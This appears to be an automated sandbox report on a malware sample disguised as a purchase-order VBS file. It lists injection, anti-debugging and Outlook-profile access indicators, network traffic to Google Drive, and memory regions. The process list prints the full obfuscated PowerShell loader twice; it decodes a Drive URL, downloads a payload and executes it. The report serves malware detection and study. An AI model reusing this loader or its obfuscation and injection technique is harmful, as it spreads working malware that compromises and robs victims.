| Key opened | \REGISTRY\USER\S-1-5-21-983155329-280873152-1838004294-1000\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook | C:\Program Files (x86)\windows mail\wab.exe | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-983155329-280873152-1838004294-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook | C:\Program Files (x86)\windows mail\wab.exe | N/A |
Legitimate hosting services abused for malware hosting/C2
| Description | Indicator | Process | Target |
| N/A | drive.google.com | N/A | N/A |
| N/A | drive.google.com | N/A | N/A |
| N/A | drive.google.com | N/A | N/A |
Suspicious use of NtCreateThreadExHideFromDebugger
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files (x86)\windows mail\wab.exe | N/A |
Suspicious use of NtSetInformationThreadHideFromDebugger
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\windows mail\wab.exe | N/A |
Suspicious use of SetThreadContext
| Description | Indicator | Process | Target |
| PID 3976 set thread context of 4612 | N/A | C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe | C:\Program Files (x86)\windows mail\wab.exe |
Enumerates physical storage devices
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious behavior: MapViewOfSection
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of WriteProcessMemory
outlook_office_path
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\USER\S-1-5-21-983155329-280873152-1838004294-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook | C:\Program Files (x86)\windows mail\wab.exe | N/A |
outlook_win_path
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\USER\S-1-5-21-983155329-280873152-1838004294-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook | C:\Program Files (x86)\windows mail\wab.exe | N/A |
Processes
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\PO 05-03-2024 AKTINA-CDS.vbs"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "<#Baissers Gennemlevet Skovmaare bordlampernes overdepending Tinged Solvation #>;$Tartane=(cmd /c set /A 115^^0);Function Greaseless ([String]$Dampsprre){$Tartane=[char][int]$Tartane;$Singlesculleren=$Tartane+'ubstring';$Saamaskinenndgaar=8;$Artifact=Rigsrevisorloven4($Dampsprre);For($Saamaskinen=7; $Saamaskinen -lt $Artifact; $Saamaskinen+=$Saamaskinenndgaar){$Apeks10=$Dampsprre.$Singlesculleren.Invoke($Saamaskinen, 1);$Rigsrevisorloven=$Rigsrevisorloven+$Apeks10;}$Rigsrevisorloven;}function Signficantly ($Gring){& ($Rigsrevisorloven01) ($Gring);}function Rigsrevisorloven4 ([String]$Argumentspecifikationer){$Forstrke1=$Argumentspecifikationer.Length-1;$Forstrke1;}$Rigsrevisorloven02=Greaseless 'ForskreTfins.rir,armeovameletinnF.restislaseretf Frimnde C mmisrBa tegnrUndg,deimokkasinExpurgagGotikse ';$berigningernes=Greaseless 'haan.vghIndurant Vr,raat Au,incp GidselsOx loac:Teskere/Snorket/ An,aegdFjortenrC.mpingiEnforesvtoxaemieSerm.ni.MuscavagCorantoo troweloAuktiong i terwlZimmerweOverdom. KsnehacHy.rocao Bron.hmdisabus/Ubenvntu SkudtecFor,igt?LiftingeRecon ixclinchepCigaretoBa,udlnrNeij.sst Ign,pu= StikledRaveineo Infa cw.omitecnFimsenelAssertooKretidsaDialytidVirks m&SetterniOligosydMyelopa=Grammat1BoligenVBakkendCG.rmantd overvaQAfs ndi1 D.crepJConringa PostpaB Vinter2NavneorGL.mperacTrypt scprighooj UnsolduGe,brugCMarkmaniMislighOOldefdrgErotomaeHobbier4Begi,en6Nobesge1Sama,beuClang.nX .eningQFunktioQWandlikDSurprecfRhi.inaadagligp9 zoopsy- T.iennMHnsehus ';$Rigsrevisorloven01=Greaseless 'ManglediRinninge buliabxunderv ';$Rigsrevisorloven00=Greaseless 'Sej ruk$DelnoeggKedlenslBontebuoLfterbebMacrongaParticulUllings:nonco,gFSubc.ntoUdtydedrVaarbebs VekseltP estigrKvitt rkCir,opheHaiku t8Mis kst Leg,ml=Splodge SteelhSSpexenet C,lpitaRurlgeurUnwishetN nelec-LauraldB Ta ineiIngardstNcarspjsDenotabTLi enyrrBaptisia Fnblgnnste.svisPredictfOmstbnieAntistarSoegete Weake,s-NebulisSAktieliomurksvauInnovatrDommed c UglereeRipston Afmatni$Di gorgb S.kkerepeekab,rMilj raiMisr,lagFlisesenRetroveiS.goejnnSpectacgBeskedee,nvoicirParchisnMes.erieVizslassPrdikat Tuefor-EcstatiDNuancineSe,ologsSoilagetElektroi.onfilinSpyendeaReoperatComakesiSpir tuoOperatin Massse Pi.kups$ AcademFC onicroTramcarrSmands.s ,ortiet TerefarSkndetfk Udf.lieMiskych2Interb ';Signficantly (Greaseless 'Co.tain$.agnomsg An,ulllBagmakeoSvejsefbMedmenna Taalsoleksiler:odontolFUdmaltioRo.ekonrUnhea,esRdmedestKrediterL,ftsrukKjrulffeLagrang2 Nailed=Besl.gs$ balanceWeaklinnTod menvE.sanci:OuttradaRoaredgp AllonypRepo,tedCnidosiaRchitectJordaneaSimulta ') ;Signficantly (Greaseless 'Steg paI leskabmFormyndp nfanteoAandsslr NovemptLaven m-Slid,etM ,andfroAntagondGlan,esuHoutp rlAbund.neSin,fot ArbejdsB ma icbiTryksvatT.rbenssRedeploTAfbankirForn.ftaKorporlnPont.acsuafgjorf upbuoyeSquitterCompreh ') ;$Forstrke2=$Forstrke2+'\Sprgerens.Cav' ;Signficantly (Greaseless 'Condole$FinnmargFormumnl ,ectonoKrybeipbPlankevaCystostl gyptol:AbjectiFInvendioS,dafrirTumefyisSaucematSamtykkr .olysekHalvbueeunderto7 Indpla=Adjoint(CrapaudT NajendeCorrectsHe stnitDekater-PewskenPDcorbeaa Hol.bat ypnothT.olley Reneta$ bullpuFVergerloBradawlr DataposPreco.ftMillasnrdomsto.kMisalt,eSpinope2 krome.) Spiree ') ;while (-not $Forstrke7) {Signficantly (Greaseless 'Fals fiI.lagetof Sta tt Deaconr(Vand va$ Smit.eFTapereroIndustrrFactitisEtrusketOutrivar.lektrok FedthaeDaggrye8markhor.FrifindJMnst.rgoR geligbTvangs.SSubk,tatNeutralaPrestidt AffirmeLrkenpa Appoint-afparereL itancqmandsch Stersky$ByggeleR VakuumiKonjakggScisselsKaprerer DivorceThundervRykkerbiS lfsaisBnli.esoNostalgr,lamodil ForeneoSpadserv Tax,cleHrdneafn Forskr0Kassevo2 Un,len)unfondn Coccoli{Sul rinSVi,tualtBe,ixttaS,gnetrrTruge.st D sire-Sul.anaSSkiftetlIreosoveLich ake LbepompNocerit Virksom1 Paaske}Sheart,eWillfulls.necurs slugteenarcoti{Krom toS Univert sk.vsaamispricrDevisertFission- T milsSLitt ralPaydayseE.spreseBenzinspbestikk Wayment1App.oks;Omprio S,elanchiIntershgAfstikknMagasr.fS,imulaiMetalwocPhytopta Stabe nOve.skatTrbe kyl Affyrey Topbet Spoofed$IndskrnR remindiHornbeagCascromsDuplikerSagestke PoliorvDiscan,inabolagsPrevailobagpiperKonias lFor.udsoKonsulevsham,oceDjvleudn.echeck0Potable0 F,jlre}Portabi ');Signficantly (Greaseless 'Apokope$GadeuorgSulfidelAdminisoStallmabAminoaca Thane,lFormnin:Lobu.itF HjemadoSubstanrGenrefosStorktrtLeveaarrTehuseskPro meneOrdrese7Choledo=Palaeon(FlagdugTPlayfele Vagtlesmotortrt enmoto-millocrP AmmermabygningtMesenteh Aan.sa Trichob$S.isekaF Kva.taoBekendtrPsoralesPhe,ometW,edlinrCharro,kIlluviaehaugesk2Hormone)Opsugni ') ;}Signficantly (Greaseless 'Tegular$VrimlengEng andl.idevenoB naughbK ightaaAfskumnl Quinti: hallotA PolyppvNveombuaAfmattenautopyoiOberstlaUnderst bi che=Bekrfte IdelrerGUnders eTransshtjockey.-G,atbruC ateteroTe egranDetailptAlarmu,e quaes nUnpretet Kodese Coadjut$SongletFHockeykoBow yparMaccabasNeedypetNe.opanr Morakkk kiftereUnhinde2 .ndlin ');Signficantly (Greaseless 'Heterom$ Phyt,ggHeadendlW.shasto spidombBygg saa Ind omlHeksame: Sa,ctiKexcernboNytaarsgOkkupateVirksoms BygakspMatchmarHenaandiDengsertSpkkecotUnbedfae Sorts nAmiasresMercena Skihopp=Accroac Suppler[ BelizeSSpr ngdy,roszyssPolyphot muldreKlevarem erdeop.ModpartCRameousoAffichenUomgn ev profuneModningrProgr.mt Siksak]Corfit :Bisfrak: HarehoFTrffe.irB ligydoHomacanmGulasmaBFjerndia lfactisTerceleeAgkistr6Worce.t4DopingsSLispountBirianirSul,houiSparusmnGeodt.agFalskne( Shortc$ PeriskADisobedvExpensiaFodfolknBu.lcomiSolomonaLi.iere)sekundr ');Signficantly (Greaseless 'Forplig$congealgScenefulUnblindoTvangsfbbermudaa Spade,l ,vangl:Folkl,rR CachuaiProlifegOverrassFibromerMrkningeUnder rvFrigreliVividvisProletaoFr sager Sl etrl Sj.tteoStavbaavBeinlyaeBayonnenDvelrer2Tautego Returko=.nlaure Vildsku[Unde,kuStegneseyOrganogsKinostetOutgaineKvaseh.m U.beau.LectureTclacklie,amnonixAgnyomstUnresem. PellitEAntioxinBa,talecB,llatao patterdDefineriUltrafinanthracgS.miorg]Fase um:Berl ne:Demole ASa dierSLatyrusCUnree,eI KinesiIstyrtdy.vildmndG PinchpeFyldetstAfknapsS KertertErgoterrEyeglasi psychrnLio.neagscirocc(Tensio.$Par.plyKPrepareoMo.elfogForn teeTopdelesSu.fonapUndergrrTankeeki FanebltRaillert Flerkoeisotenin SchismsFluorid)Cdgchau ');Signficantly (Greaseless 'Unmedic$compagngAn.ennelMatematoApoteksbFri.hteaUdp,ntelsuccour:TopbetjR Slgendi unexplg,ervekrsSekraftrPtilotae glennsvEntomoliSamanfesCystosyo durganruforesplFungiteo Radforv,verstaeDroschenTerras.3.amenen=Stegefe$,edsaltRImbeciliPr,gramg.tikdaas OmbrinrStrongyeRati,navBrnd,mriChastitsAsymmetog,andoar TuberclSubmucoocrackmavVkstbeteMilieubnC.illin2Hftetsb.Tr,holds,steriau Ru,egobBugspytsTramlintLitt,rtrDesillui SergelnMillen,gFravnni( Nyopre3 E fing2Frances2 Str so4 Po.ari7Equipoi2 Anpart,mismeas3Carragh1Syn.opa2Lugedes6Gos ipi1S.spect) Afsk,b ');Signficantly $Rigsrevisorloven3;"
C:\Windows\system32\cmd.exe
"C:\Windows\system32\cmd.exe" /c set /A 115^^0
C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "<#Baissers Gennemlevet Skovmaare bordlampernes overdepending Tinged Solvation #>;$Tartane=(cmd /c set /A 115^^0);Function Greaseless ([String]$Dampsprre){$Tartane=[char][int]$Tartane;$Singlesculleren=$Tartane+'ubstring';$Saamaskinenndgaar=8;$Artifact=Rigsrevisorloven4($Dampsprre);For($Saamaskinen=7; $Saamaskinen -lt $Artifact; $Saamaskinen+=$Saamaskinenndgaar){$Apeks10=$Dampsprre.$Singlesculleren.Invoke($Saamaskinen, 1);$Rigsrevisorloven=$Rigsrevisorloven+$Apeks10;}$Rigsrevisorloven;}function Signficantly ($Gring){& ($Rigsrevisorloven01) ($Gring);}function Rigsrevisorloven4 ([String]$Argumentspecifikationer){$Forstrke1=$Argumentspecifikationer.Length-1;$Forstrke1;}$Rigsrevisorloven02=Greaseless 'ForskreTfins.rir,armeovameletinnF.restislaseretf Frimnde C mmisrBa tegnrUndg,deimokkasinExpurgagGotikse ';$berigningernes=Greaseless 'haan.vghIndurant Vr,raat Au,incp GidselsOx loac:Teskere/Snorket/ An,aegdFjortenrC.mpingiEnforesvtoxaemieSerm.ni.MuscavagCorantoo troweloAuktiong i terwlZimmerweOverdom. KsnehacHy.rocao Bron.hmdisabus/Ubenvntu SkudtecFor,igt?LiftingeRecon ixclinchepCigaretoBa,udlnrNeij.sst Ign,pu= StikledRaveineo Infa cw.omitecnFimsenelAssertooKretidsaDialytidVirks m&SetterniOligosydMyelopa=Grammat1BoligenVBakkendCG.rmantd overvaQAfs ndi1 D.crepJConringa PostpaB Vinter2NavneorGL.mperacTrypt scprighooj UnsolduGe,brugCMarkmaniMislighOOldefdrgErotomaeHobbier4Begi,en6Nobesge1Sama,beuClang.nX .eningQFunktioQWandlikDSurprecfRhi.inaadagligp9 zoopsy- T.iennMHnsehus ';$Rigsrevisorloven01=Greaseless 'ManglediRinninge buliabxunderv ';$Rigsrevisorloven00=Greaseless 'Sej ruk$DelnoeggKedlenslBontebuoLfterbebMacrongaParticulUllings:nonco,gFSubc.ntoUdtydedrVaarbebs VekseltP estigrKvitt rkCir,opheHaiku t8Mis kst Leg,ml=Splodge SteelhSSpexenet C,lpitaRurlgeurUnwishetN nelec-LauraldB Ta ineiIngardstNcarspjsDenotabTLi enyrrBaptisia Fnblgnnste.svisPredictfOmstbnieAntistarSoegete Weake,s-NebulisSAktieliomurksvauInnovatrDommed c UglereeRipston Afmatni$Di gorgb S.kkerepeekab,rMilj raiMisr,lagFlisesenRetroveiS.goejnnSpectacgBeskedee,nvoicirParchisnMes.erieVizslassPrdikat Tuefor-EcstatiDNuancineSe,ologsSoilagetElektroi.onfilinSpyendeaReoperatComakesiSpir tuoOperatin Massse Pi.kups$ AcademFC onicroTramcarrSmands.s ,ortiet TerefarSkndetfk Udf.lieMiskych2Interb ';Signficantly (Greaseless 'Co.tain$.agnomsg An,ulllBagmakeoSvejsefbMedmenna Taalsoleksiler:odontolFUdmaltioRo.ekonrUnhea,esRdmedestKrediterL,ftsrukKjrulffeLagrang2 Nailed=Besl.gs$ balanceWeaklinnTod menvE.sanci:OuttradaRoaredgp AllonypRepo,tedCnidosiaRchitectJordaneaSimulta ') ;Signficantly (Greaseless 'Steg paI leskabmFormyndp nfanteoAandsslr NovemptLaven m-Slid,etM ,andfroAntagondGlan,esuHoutp rlAbund.neSin,fot ArbejdsB ma icbiTryksvatT.rbenssRedeploTAfbankirForn.ftaKorporlnPont.acsuafgjorf upbuoyeSquitterCompreh ') ;$Forstrke2=$Forstrke2+'\Sprgerens.Cav' ;Signficantly (Greaseless 'Condole$FinnmargFormumnl ,ectonoKrybeipbPlankevaCystostl gyptol:AbjectiFInvendioS,dafrirTumefyisSaucematSamtykkr .olysekHalvbueeunderto7 Indpla=Adjoint(CrapaudT NajendeCorrectsHe stnitDekater-PewskenPDcorbeaa Hol.bat ypnothT.olley Reneta$ bullpuFVergerloBradawlr DataposPreco.ftMillasnrdomsto.kMisalt,eSpinope2 krome.) Spiree ') ;while (-not $Forstrke7) {Signficantly (Greaseless 'Fals fiI.lagetof Sta tt Deaconr(Vand va$ Smit.eFTapereroIndustrrFactitisEtrusketOutrivar.lektrok FedthaeDaggrye8markhor.FrifindJMnst.rgoR geligbTvangs.SSubk,tatNeutralaPrestidt AffirmeLrkenpa Appoint-afparereL itancqmandsch Stersky$ByggeleR VakuumiKonjakggScisselsKaprerer DivorceThundervRykkerbiS lfsaisBnli.esoNostalgr,lamodil ForeneoSpadserv Tax,cleHrdneafn Forskr0Kassevo2 Un,len)unfondn Coccoli{Sul rinSVi,tualtBe,ixttaS,gnetrrTruge.st D sire-Sul.anaSSkiftetlIreosoveLich ake LbepompNocerit Virksom1 Paaske}Sheart,eWillfulls.necurs slugteenarcoti{Krom toS Univert sk.vsaamispricrDevisertFission- T milsSLitt ralPaydayseE.spreseBenzinspbestikk Wayment1App.oks;Omprio S,elanchiIntershgAfstikknMagasr.fS,imulaiMetalwocPhytopta Stabe nOve.skatTrbe kyl Affyrey Topbet Spoofed$IndskrnR remindiHornbeagCascromsDuplikerSagestke PoliorvDiscan,inabolagsPrevailobagpiperKonias lFor.udsoKonsulevsham,oceDjvleudn.echeck0Potable0 F,jlre}Portabi ');Signficantly (Greaseless 'Apokope$GadeuorgSulfidelAdminisoStallmabAminoaca Thane,lFormnin:Lobu.itF HjemadoSubstanrGenrefosStorktrtLeveaarrTehuseskPro meneOrdrese7Choledo=Palaeon(FlagdugTPlayfele Vagtlesmotortrt enmoto-millocrP AmmermabygningtMesenteh Aan.sa Trichob$S.isekaF Kva.taoBekendtrPsoralesPhe,ometW,edlinrCharro,kIlluviaehaugesk2Hormone)Opsugni ') ;}Signficantly (Greaseless 'Tegular$VrimlengEng andl.idevenoB naughbK ightaaAfskumnl Quinti: hallotA PolyppvNveombuaAfmattenautopyoiOberstlaUnderst bi che=Bekrfte IdelrerGUnders eTransshtjockey.-G,atbruC ateteroTe egranDetailptAlarmu,e quaes nUnpretet Kodese Coadjut$SongletFHockeykoBow yparMaccabasNeedypetNe.opanr Morakkk kiftereUnhinde2 .ndlin ');Signficantly (Greaseless 'Heterom$ Phyt,ggHeadendlW.shasto spidombBygg saa Ind omlHeksame: Sa,ctiKexcernboNytaarsgOkkupateVirksoms BygakspMatchmarHenaandiDengsertSpkkecotUnbedfae Sorts nAmiasresMercena Skihopp=Accroac Suppler[ BelizeSSpr ngdy,roszyssPolyphot muldreKlevarem erdeop.ModpartCRameousoAffichenUomgn ev profuneModningrProgr.mt Siksak]Corfit :Bisfrak: HarehoFTrffe.irB ligydoHomacanmGulasmaBFjerndia lfactisTerceleeAgkistr6Worce.t4DopingsSLispountBirianirSul,houiSparusmnGeodt.agFalskne( Shortc$ PeriskADisobedvExpensiaFodfolknBu.lcomiSolomonaLi.iere)sekundr ');Signficantly (Greaseless 'Forplig$congealgScenefulUnblindoTvangsfbbermudaa Spade,l ,vangl:Folkl,rR CachuaiProlifegOverrassFibromerMrkningeUnder rvFrigreliVividvisProletaoFr sager Sl etrl Sj.tteoStavbaavBeinlyaeBayonnenDvelrer2Tautego Returko=.nlaure Vildsku[Unde,kuStegneseyOrganogsKinostetOutgaineKvaseh.m U.beau.LectureTclacklie,amnonixAgnyomstUnresem. PellitEAntioxinBa,talecB,llatao patterdDefineriUltrafinanthracgS.miorg]Fase um:Berl ne:Demole ASa dierSLatyrusCUnree,eI KinesiIstyrtdy.vildmndG PinchpeFyldetstAfknapsS KertertErgoterrEyeglasi psychrnLio.neagscirocc(Tensio.$Par.plyKPrepareoMo.elfogForn teeTopdelesSu.fonapUndergrrTankeeki FanebltRaillert Flerkoeisotenin SchismsFluorid)Cdgchau ');Signficantly (Greaseless 'Unmedic$compagngAn.ennelMatematoApoteksbFri.hteaUdp,ntelsuccour:TopbetjR Slgendi unexplg,ervekrsSekraftrPtilotae glennsvEntomoliSamanfesCystosyo durganruforesplFungiteo Radforv,verstaeDroschenTerras.3.amenen=Stegefe$,edsaltRImbeciliPr,gramg.tikdaas OmbrinrStrongyeRati,navBrnd,mriChastitsAsymmetog,andoar TuberclSubmucoocrackmavVkstbeteMilieubnC.illin2Hftetsb.Tr,holds,steriau Ru,egobBugspytsTramlintLitt,rtrDesillui SergelnMillen,gFravnni( Nyopre3 E fing2Frances2 Str so4 Po.ari7Equipoi2 Anpart,mismeas3Carragh1Syn.opa2Lugedes6Gos ipi1S.spect) Afsk,b ');Signficantly $Rigsrevisorloven3;"
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /c set /A 115^^0
C:\Program Files (x86)\windows mail\wab.exe
"C:\Program Files (x86)\windows mail\wab.exe"
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 180.178.17.96.in-addr.arpa | udp |
| US | 8.8.8.8:53 | g.bing.com | udp |
| US | 204.79.197.200:443 | g.bing.com | tcp |
| US | 8.8.8.8:53 | 138.32.126.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 183.142.211.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 200.197.79.204.in-addr.arpa | udp |
| US | 8.8.8.8:53 | drive.google.com | udp |
| NL | 142.250.179.142:443 | drive.google.com | tcp |
| US | 8.8.8.8:53 | drive.usercontent.google.com | udp |
| NL | 142.251.36.33:443 | drive.usercontent.google.com | tcp |
| US | 8.8.8.8:53 | 142.179.250.142.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 33.36.251.142.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 55.36.223.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 241.154.82.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 133.211.185.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 41.110.16.96.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 103.169.127.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 56.126.166.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 232.168.11.51.in-addr.arpa | udp |
| NL | 142.250.179.142:443 | drive.google.com | tcp |
| US | 8.8.8.8:53 | 195.179.250.142.in-addr.arpa | udp |
| NL | 142.251.36.33:443 | drive.usercontent.google.com | tcp |
| US | 8.8.8.8:53 | 18.134.221.88.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 100.5.17.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 119.110.54.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 240.221.184.93.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 74.135.221.88.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 173.178.17.96.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 13.227.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | tse1.mm.bing.net | udp |
| US | 204.79.197.200:443 | tse1.mm.bing.net | tcp |
| US | 204.79.197.200:443 | tse1.mm.bing.net | tcp |
| US | 204.79.197.200:443 | tse1.mm.bing.net | tcp |
| US | 204.79.197.200:443 | tse1.mm.bing.net | tcp |
| US | 204.79.197.200:443 | tse1.mm.bing.net | tcp |
| US | 8.8.8.8:53 | 26.35.223.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 217.135.221.88.in-addr.arpa | udp |
Files
memory/2968-4-0x0000013DAA840000-0x0000013DAA862000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_pmwmh0cn.vnw.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
memory/2968-14-0x00007FFA4D1A0000-0x00007FFA4DC61000-memory.dmp
memory/2968-16-0x0000013DA87C0000-0x0000013DA87D0000-memory.dmp
memory/2968-15-0x0000013DA87C0000-0x0000013DA87D0000-memory.dmp
memory/2968-17-0x0000013DAAD10000-0x0000013DAAD36000-memory.dmp
memory/2968-18-0x0000013DAADA0000-0x0000013DAADB4000-memory.dmp
memory/2968-19-0x0000013DA87C0000-0x0000013DA87D0000-memory.dmp
memory/3976-20-0x00000000028A0000-0x00000000028D6000-memory.dmp
memory/3976-21-0x0000000074F10000-0x00000000756C0000-memory.dmp
memory/2968-22-0x00007FFA4D1A0000-0x00007FFA4DC61000-memory.dmp
memory/3976-23-0x0000000004F40000-0x0000000004F50000-memory.dmp
memory/3976-24-0x0000000005580000-0x0000000005BA8000-memory.dmp
memory/3976-30-0x00000000053F0000-0x0000000005412000-memory.dmp
memory/3976-35-0x0000000005C20000-0x0000000005C86000-memory.dmp
memory/3976-36-0x0000000005C90000-0x0000000005CF6000-memory.dmp
memory/3976-37-0x0000000005D00000-0x0000000006054000-memory.dmp
memory/3976-38-0x0000000006180000-0x000000000619E000-memory.dmp
memory/3976-39-0x00000000061E0000-0x000000000622C000-memory.dmp
memory/3976-40-0x00000000079D0000-0x000000000804A000-memory.dmp
memory/3976-41-0x0000000007350000-0x000000000736A000-memory.dmp
memory/3976-42-0x0000000007410000-0x00000000074A6000-memory.dmp
memory/3976-43-0x00000000073B0000-0x00000000073D2000-memory.dmp
memory/3976-44-0x0000000008600000-0x0000000008BA4000-memory.dmp
memory/3976-45-0x00000000073E0000-0x0000000007402000-memory.dmp
memory/2968-46-0x0000013DA87C0000-0x0000013DA87D0000-memory.dmp
memory/3976-47-0x0000000007680000-0x0000000007694000-memory.dmp
memory/3976-48-0x0000000004F40000-0x0000000004F50000-memory.dmp
memory/3976-49-0x00000000078E0000-0x00000000078E1000-memory.dmp
memory/3976-50-0x0000000008BB0000-0x000000000B9D0000-memory.dmp
memory/3976-51-0x0000000008BB0000-0x000000000B9D0000-memory.dmp
memory/2968-52-0x0000013DA87C0000-0x0000013DA87D0000-memory.dmp
memory/3976-53-0x0000000074F10000-0x00000000756C0000-memory.dmp
memory/3976-54-0x0000000077931000-0x0000000077A51000-memory.dmp
memory/3976-55-0x0000000004F40000-0x0000000004F50000-memory.dmp
memory/4612-56-0x0000000001200000-0x0000000004020000-memory.dmp
memory/3976-58-0x0000000004F40000-0x0000000004F50000-memory.dmp
memory/4612-59-0x0000000077931000-0x0000000077A51000-memory.dmp
memory/4612-60-0x00000000779B8000-0x00000000779B9000-memory.dmp
memory/3976-61-0x0000000004F40000-0x0000000004F50000-memory.dmp
memory/3976-71-0x0000000008BB0000-0x000000000B9D0000-memory.dmp
memory/4612-75-0x0000000000400000-0x00000000005E4000-memory.dmp
memory/3976-78-0x0000000074F10000-0x00000000756C0000-memory.dmp
memory/3976-79-0x0000000008BB0000-0x000000000B9D0000-memory.dmp
memory/2968-82-0x00007FFA4D1A0000-0x00007FFA4DC61000-memory.dmp
memory/4612-83-0x0000000000400000-0x00000000005E4000-memory.dmp
memory/4612-87-0x0000000000400000-0x00000000005E4000-memory.dmp
memory/4612-88-0x0000000001200000-0x0000000004020000-memory.dmp